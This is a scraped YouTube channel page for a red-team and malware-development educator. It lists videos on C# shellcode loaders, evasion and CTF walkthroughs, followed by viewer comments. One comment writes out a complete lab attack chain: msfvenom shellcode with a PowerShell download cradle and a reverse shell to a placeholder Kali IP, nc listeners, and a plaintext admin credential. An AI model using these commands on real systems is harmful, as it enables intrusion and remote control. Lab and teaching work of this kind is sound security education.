- Видео 36
- Просмотров 57 905
gitgudsec
Канада
Добавлен 25 янв 2011
| gnostic explorations in malware development |
"the memes must flow."
"the memes must flow."
what is a process | malware development foundations
a short lesson as part of a new series meant to supplement my other malware development courses by providing some valuable theoretical insights.
in this inaugural lesson we'll look at the fundamental abstract unit of the windows OS - the process. inspired by the work of the great pavel yosifovich.
live long and prosper,
x
in this inaugural lesson we'll look at the fundamental abstract unit of the windows OS - the process. inspired by the work of the great pavel yosifovich.
live long and prosper,
x
Просмотров: 486
Видео
C# payload mastery 04 - aes encryption
Просмотров 7116 месяцев назад
link to code: encryption = github.com/faanross/payloads_mastery/blob/master/04a_encryption_aes.cs decryption = github.com/faanross/payloads_mastery/blob/master/04b_decryption_payload_aes.cs decryption breakpoints = github.com/faanross/payloads_mastery/blob/master/04c_decryption_payload_aes_debug.cs computerphile video on aes encryption theory = ruclips.net/video/O4xNJsjtN6E/видео.html in this f...
C# payload mastery 03 - basic evasion + time-delayed execution + junk code insertion
Просмотров 1,3 тыс.6 месяцев назад
NOTE: This is a reupload, original video was uploaded 16 April 2024, but contained an egregious error, corrected here. link to code: github.com/faanross/payloads_mastery/blob/master/03_basic_evasion_time_delay_junk_code.cs previous video: ruclips.net/video/G7bfsQ8XQXI/видео.html in this third lesson we'll learn about some basic detection theory and use that framework to make 7 improvements to o...
C# payload mastery 02 - remote shellcode + hide console
Просмотров 7937 месяцев назад
link to code: github.com/faanross/payloads_mastery/blob/master/02_remote_payload.cs previous video: ruclips.net/video/wxslev_yha4/видео.html in this second lesson we'll build on our code from the previous lesson and implement 2 major improvements: - switch from hardcoded to remotely-hosted shellcode - hide our console window upon payload execution live long and prosper, x timestamps 00:00 - int...
C# payload mastery 01 - simple C# shellcode loader
Просмотров 1,8 тыс.8 месяцев назад
link to code: github.com/faanross/payloads_mastery/blob/master/01_simple_backdoor.cs note: code can also be found right at the bottom of this description. defcon 27 c# backdoor: github.com/mvelazc0/defcon27_csharp_workshop p/invoke signatures in c#: ruclips.net/video/baj9IpB_Z6Y/видео.html in this first lesson we'll: - use msfvenom to generate shellcode - create a simple C# loader that will per...
C# payload mastery 00 - course introduction
Просмотров 1 тыс.9 месяцев назад
C# course*: ruclips.net/video/GhQdlIFylQ8/видео.html OOP course*: ruclips.net/video/SiBw7os-_zI/видео.html win10 with fully disabled defender: ruclips.net/video/fLpI9Z60ZDQ/видео.html * = apologies, i said free code academy in the video, it's free code camp. a brief overview of my upcoming c# course: - who the course is for - what we'll cover - what you need to know - what you'll learn - what s...
pass-the-hash attack for windows privilege escalation
Просмотров 1,8 тыс.9 месяцев назад
in this lesson we perform a pass-the-hash attack to escalate our privilige: - we start off as a lower-level user - we discover a keepass database - we use smb to exfiltrate the database to our system - we use keepass2john to extract the database hash - we use hashcat to crack the database hash - we discover a ntlm hash inside of the database - we use the ntlm hash pthwinexe to spawn a new shell...
the world’s simplest custom payload (hackthebox jeeves ctf walkthrough)
Просмотров 74110 месяцев назад
- to previous jeeves video ruclips.net/video/0ybE6F0d7fc/видео.html - to juicy potatio github eternallybored.org/misc/netcat/ - juicy potato release page: github.com/ohpe/juicy-potato/releases - impacket github github.com/fortra/impacket - netcat for windows eternallybored.org/misc/netcat/ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ in this lesson we perform the manual juicy potato attack a...
HackTheBox Jeeves CTF walkthrough - Juicy Potato Attack
Просмотров 1,1 тыс.10 месяцев назад
link to hacktricks overview of juicy potato attacks: book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato link to htb jeeves: app.hackthebox.com/machines/114 in this video we explore privilege escalation via a juicy potato attack. we'll attack the hackthebox machine called 'jeeves', here using metasploit, while in the following video we'll follow a manual approac...
HackTheBox Chatterbox CTF walkthrough - Found Credentials + Buffer Overflow
Просмотров 36910 месяцев назад
HackTheBox Chatterbox CTF walkthrough - Buffer Overflow Found Credentials link to htb chatterbox: app.hackthebox.com/machines/123 in this video we explore privilege escalation via found credentials. we'll attack the hackthebox machine called 'chatterbox'. initial foothold is obtained by running a buffer overflow attack against a vulnerable service called 'achat'. twitter: @faanross #cybersecuri...
HackTheBox Devel CTF walkthrough - Privilege Escalation via Kernel Exploitation Manual Approach
Просмотров 1,3 тыс.11 месяцев назад
link to previous video: ruclips.net/video/BRurEae5vHo/видео.html link to htb devel: www.hackthebox.com/machines/devel link to introductory lecture on kernel exploitation ruclips.net/video/xHHmoEsJc58/видео.html in this video second video on kernel exploitation we'll once again use it to elevate our privs against Devel (hackthebox). this time around we're following a more manual approach without...
HackTheBox Devel CTF walkthrough - Privilege Escalation via Kernel Exploitation with Metasploit
Просмотров 60611 месяцев назад
link to htb devel: www.hackthebox.com/machines/devel link to introductory lecture on kernel exploitation ruclips.net/video/xHHmoEsJc58/видео.html in this video we explore privilege escalation via kernel exploitation, with the aid of metasploit. we'll attack the hackthebox machine called 'devel'. twitter: @faanross #cybersecurity #redteaming #c2
Creating a simple C2 LoTL backdoor (Red Team Series 005)
Просмотров 19111 месяцев назад
link to jon strand's pay-what-you-can classes: www.antisyphontraining.com/pay-what-you-can/ link to the linux cli lab (jon strand github repo): github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/LinuxCLI/LinuxCLI.md link to liveoverflow video - what is a file format?: ruclips.net/video/VVdmmN0su6E/видео.html link to learn-linux-tv video - data streams (stdin, stdout & st...
TryHackMe CTF Walkthrough - Pickle Rick
Просмотров 76611 месяцев назад
In this beginner-friendly CTF walkthrough from TryHackMe we will: - use nmap to enumerate ports/services - use gobuster to discover hidden directories and files on the web server - discover login credentials hidden on the pubic web directory - use this to log into a portal - execute remote commands from the portal on the web server - use this to get a reverse shell on target - on target we disc...
C2 Host Enumeration using LOTL techniques (Red Team Series 004)
Просмотров 18311 месяцев назад
C2 Host Enumeration using LOTL techniques (Red Team Series 004)
THREAT HUNTING DLL-injected C2 beacons FOR BEGINNERS 02 - Setup
Просмотров 1,4 тыс.11 месяцев назад
THREAT HUNTING DLL-injected C2 beacons FOR BEGINNERS 02 - Setup
C2 Domain Enumeration using Powerview and LOTL (Red Team Series 003)
Просмотров 19811 месяцев назад
C2 Domain Enumeration using Powerview and LOTL (Red Team Series 003)
TryHackMe CTF Walkthrough - Mr. Robot
Просмотров 4,6 тыс.11 месяцев назад
TryHackMe CTF Walkthrough - Mr. Robot
Basic C2 defense evasion by creating a custom dropper (Red Team Series 002)
Просмотров 281Год назад
Basic C2 defense evasion by creating a custom dropper (Red Team Series 002)
How to fully disable MS Defender for Red Teaming
Просмотров 334Год назад
How to fully disable MS Defender for Red Teaming
How to set up a simple Active Directory environment for Red Teaming
Просмотров 555Год назад
How to set up a simple Active Directory environment for Red Teaming
TryHackMe CTF Walkthrough - Basic Pentesting
Просмотров 873Год назад
TryHackMe CTF Walkthrough - Basic Pentesting
THREAT HUNTING DLL-injected C2 beacons FOR BEGINNERS 01 - Intro
Просмотров 303Год назад
THREAT HUNTING DLL-injected C2 beacons FOR BEGINNERS 01 - Intro
What is Threat Hunting pt 1 - Different Strokes for Different Folks
Просмотров 253Год назад
What is Threat Hunting pt 1 - Different Strokes for Different Folks
Python Cybersecurity for Beginners: Scanners Part 5 - Wrapper
Просмотров 962Год назад
Python Cybersecurity for Beginners: Scanners Part 5 - Wrapper
Python Cybersecurity for Beginners: Scanners Part 4 - OS Fingerprinting
Просмотров 708Год назад
Python Cybersecurity for Beginners: Scanners Part 4 - OS Fingerprinting
Python Cybersecurity for Beginners: Scanners Part 3 - Service Fingerprinting
Просмотров 964Год назад
Python Cybersecurity for Beginners: Scanners Part 3 - Service Fingerprinting
Python Cybersecurity for Beginners: Scanners Part 2 - Port Scanner
Просмотров 1 тыс.Год назад
Python Cybersecurity for Beginners: Scanners Part 2 - Port Scanner
Wasn't expecting to hear Ren part way through, nice surprise! Good video, keep them coming.
Can I unlock pdf password
I am very eager to try this all since I am beginner on python. I am building a home lab with server 2025 and windows 10. It is good to try this on windows 10, or in Server 2025? or in my host computer?
God bless you for your video. I am studying cybersecurity and your video helped me. Here are a few notes from your video that would be helpful. (1) msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('<kali_ip>:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress <kali_ip> -Port 4445\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python Add "buf" to python script. (2) Create listener on kali: nc -nvlp 4445 (3) provide the powershell script (Invoke-PowerShellTcp.ps1) using http server: python -m http.server 8000 (4) This should give you a powershell window on Chatterbox as user alfred: python 36025_achat.py reg query HKLM /f password /t REG_SZ /s reg query "complete contents of key containing password" (5) On Chatterbox powershell window: $cred = New-Object System.Management.Automation.PSCredential('Administrator', (ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force)) (6) on kali: nc -nvlp 1235 (7) This should give you an administrator window on Chatterbox: Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).downloadString('<kali_ip>:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress <kali_ip> -Port 1235" -Credential $cred
Damn my friend your videos are spectacular. Excellent line by line explanation and detail. I’m definitely following your page. Keep up the great work.
Finally someone who explains it in an understandable way Thank you Subbed
thanks tig, appreciate the comment :)
Will this work with two Windows VMs instead of Linux?
No, the firewall is a wrapper for iptables, which is a linux application
Thankyou for your instructions, I find your projects very beneficial and understandable for someone who is starting out in learning about Networking like me.
appreciate the comment!
Great video but I feel like you skipped the hardest part of the code to understand which starts with with ThreadPoolExecutor and ending with return. Also I feel like you could have explained why we chose that port range from 1 to 1024
@@RamiSobhani hey rami - appreciate the critique. this was one of the first videos i ever made and certainly agree there is A LOT that could have been better. unfortunate property of vids is they can’t be updated… perhaps i’ll do an improved version in the future. keep well 🖖🏻
@@gitgudsec thanks
This course is amazing, thankyou!
Great video, at first my virtual machines couldn't communicate. Had to go into both and change the Network it Internal Network and it worked.
can i know more about IP and all
sure, if you want to brush up on networking fundamentals may i recommend 'professor messer' and 'practical networking' channels, and then to get some practical experience do some wireshark tutorials by 'chris greer'.
its only scanning once in ma pc, whats the isuue?
Can i follow up if I am on Windows 11
Yes, install WSL2 or download virtualbox and run a Linux VM - all free
I have one thing to say about this video.... TOASTYY! 😆
I spent 11 hours, I'm not jk, trying to finish this lab. Thank you so much for this video. Its 12:42 am and thanks to you I was able to finish. God bless you!
soooooo happy to receive this message, thanks for taking the time to share vanessa! x
You've shed a brighter light on the concept which create a ray of ......
Man, I am in love with your channel! And when I saw "Live long and prosper" I knew that you are a kind person, Star Trek fans are the best <3 btw what is the name of this kind of animation?
@@ruanmachadodev comments like these mean so much - thanks 🫶🏻 not sure what to call it, me and my gf do it in guess you say it’s “glitch-ASCII”… just trying to make things I find beautiful 🖖🏻🖖🏻
@@gitgudsec Thank you so much! I hope all the bests for you and your gf! 🖖🖖
Man you just became a mentor for me. I subscribed without hesitating. Permit me to call you 😅😅
100 perent effort and 0 viewers. very underrated channel. keep the gud work buddy
Hacked
this is perfection haha
thank you dude
great content brother thx
FIRE, first time understanding someone's script after some time of self studying python and automation!
i'm about to start a master degree in cybersecurity and wanted to learn something by my own before the course... and bro yours is amazing. Love the way u teach and how u dont speed-up things, very well done job and thx for everything im gonna learn.
This tutorial goes by so quickly. Was this under the assumption that someone already knows basic coding?
Yeah he should really take out the beginners from the title. He just sped by this as if you already know how to build a script in Python.
@@Beyondlimits_400yeah i know its ridiculous! we should all demand a refund!!
@@theuxofai3907 Yes it’s free lol, with that my point is that it’s a bit of a shitty course if it’s aimed at people who have never coded.
@@Beyondlimits_400if you find it shitty literally stop watching and choose among the other 1000s of free python courses at your level lol. You think he can make a single course for literally where every single person is at? Hilarious entitlement lol.
@@Beyondlimits_400this is extremely simple btw, if you are looking for an INTRODUCTORY course, just look for that.
Love the content bro, new subscriber!
How to execute it without hack the bix
sorry for how late this comment is but i dont understand what the git gud and lobo is nor where do I access it , I figured out how to import scrappy but im a bit confused as i feel some steps were skipped btw i use pycharm
just wow 👏
I love the art style on the asii gifs! who is the artist?
thanks friend. the opening scene wizard is from a game called stone story. i made all the animals looping ascii gifs in AE, my girlfriend made the "explainer" animations. x
@@gitgudsec awesome, thank you! The videos look so smooth
@@f1shh-sec really appreciate that <3
Well after here, where does it continue? next episode.
i try to send from my VM kali to VM Ubuntu, but in Ubuntu, it doesn't have any response. The firewall is working normally
very good videos idk how do you have so low subs but you really deserve more. One of the best teaching and editing cyber security videos out there
hey patates, thanks for the comment - appreciate it. to be frank this is just a labour of love, i originally started it to help me break into industry and land my first job - it already succeeded in that regard. now i'm just continuing because i genuinely enjoy it, it's a way for me to still practice design, animation etc. so not really chasing views, just getting nice comments like this is more than enough for me. hopefully i'll help a few people along the way. keep well.
Great content.
Huge compliment coming from you, appreciate it.
good
Can you make more advanced techniques red team and evasion
sure, anything specific you’re interested in?
@@gitgudsec defense evasion Powershell obfuscation ....
what are those ASCII gif shapes ? where is that from
you mean the background animations - skull, jellyfish etc? made them in after effects.
also, the backgrounds they are superimposed on are from 'tektronix' - old analog animation.
🔥🔥🫡 Quality content
Slick from top to bottom. Great Success! 🔥👌🏻🔥
important correction: when i mentioned my process for "massaging" code i mentioned changing function/variable names + comments as examples of things you can do to affect it. thanks to Jason Cage for pointing out this won't actually have any effect since this is all stripped away when compiling. some other changes i made that will (most likely) affect the binary: - changed order of variable declaration - where some variables were first initialized to null and later assigned, i initialized them to eventual value immediately - changed printf statements if you'd like a more comprehensive understanding of exactly what changes i made - generate template with hellshell and compare to my code in description - for a shortcut just ask some LLM to point out all the differences also, you can run DefenderCheck from matterpreter vs the template, it will show you exactly what gets flagged, and then you can work to address it, test again with DefenderCheck.... iterate until you pass muster. apologies on the slip-up, i'm learning with y'all. x
Hi, I love your content. Just a question, though. What are the methods to bypass signature detection? Does adding or removing comments and changing variable names and function names work? I heard that doing these won't reflect on the compiled executable since it removes the comments from the binary, etc.
hey, thanks appreciate it. this is a great point and you are 100% spot on. i guess i was stuck in C# paradigm where, since it's compiled to CIL, function/variable names are retained. but yeah comments always stripped, not sure what i was thinking perhaps referring to the fact that i changed the printf output. when i "massaged" i also changed order where i could, order of variable declarations, and for example where before initially some of the local variables were initialized to NULL and only assigned later, i just initialized them to their values immediately. my process was somewhat chaotic, i just went through it making changes and retried it, it worked first time, so unsure where the "line" was, but of course you could use defendercheck to ID what part exactly is triggering the detection). hope this helps, obvs feel free to compare the hellshell output to the code i linked above since its pre- and post changes i made. and thanks for pointing this out, i'll pin a correction to top of comments, and will attempt to clarify in a future vid. keep well.
quality content, gg
Big fan
Man your awesome thanks
Next vedio bro
Finalizing the script, it’s coming! IPfuscation with HellShell x
Bro develop,a adware ,spyware,a randsomeware plss prepare vedio for me bro?do for me bro
@@SathyaVelu-t5v hey bro i'm DEF never ever going to do any adware, scourge of the earth. i'm currently developing an entire course on creating a RAT in C#, it will have keylogging, screen capture etc so will scratch your spyware itch. As for ransomware, it's something i'll eventually get to maybe, my real focus is on what occurs immediately following exploitation. thanks for the suggests.